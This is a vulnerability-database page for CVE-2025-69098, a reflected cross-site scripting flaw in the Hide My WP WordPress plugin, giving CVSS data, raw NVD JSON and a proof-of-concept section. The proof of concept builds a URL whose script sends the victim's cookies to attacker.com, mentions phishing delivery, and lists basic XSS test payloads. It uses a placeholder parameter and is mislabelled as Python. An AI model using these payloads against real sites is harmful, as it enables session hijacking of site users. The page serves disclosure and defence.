Security Vulnerability Report
中文
CVE-2025-69098 CVSS 7.1 HIGH

CVE-2025-69098

Published: 2026-01-22 17:16:23
Last Modified: 2026-04-27 20:16:27

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWave Hide My WP hide_my_wp allows Reflected XSS.This issue affects Hide My WP: from n/a through <= 6.2.12.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Hide My WP <= 6.2.12

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-69098 PoC - Reflected XSS in Hide My WP Plugin --> <!-- Target: WordPress site with Hide My WP plugin <= 6.2.12 --> <!-- Malicious URL Structure --> <!-- Replace 'target-site.com' with the vulnerable WordPress site --> <!-- Replace 'PARAMETER' with the vulnerable parameter name --> <!-- Replace 'PAYLOAD' with the XSS payload --> <!-- Example malicious URL --> <!-- https://target-site.com/?PARAMETER=<script>alert(document.cookie)</script> --> <!-- JavaScript PoC for stealing cookies --> <script> // Construct the malicious URL var baseUrl = window.location.origin; var maliciousUrl = baseUrl + '/?PARAMETER=<script>var+img=document.createElement("img");img.src="https://attacker.com/steal?c="+encodeURIComponent(document.cookie);document.body.appendChild(img);<\/script>'; // In a real attack, this would be delivered via phishing email or other social engineering console.log('Malicious URL:', maliciousUrl); // For demonstration, log stolen cookies console.log('Session Cookies:', document.cookie); </script> <!-- Basic XSS test payload --> <!-- <img src=x onerror=alert('XSS')> --> <!-- <svg/onload=alert(document.domain)> --> <!-- <script>alert(document.cookie)</script> -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69098", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:22.563", "lastModified": "2026-04-27T20:16:27.377", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in wpWave Hide My WP hide_my_wp allows Reflected XSS.This issue affects Hide My WP: from n/a through <= 6.2.12."}, {"lang": "es", "value": "Neutralización Inadecuada de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en wpWave Hide My WP hide_my_wp permite XSS Reflejado. Este problema afecta a Hide My WP: desde n/a hasta &lt;= 6.2.12."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/hide_my_wp/vulnerability/wordpress-hide-my-wp-plugin-6-2-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}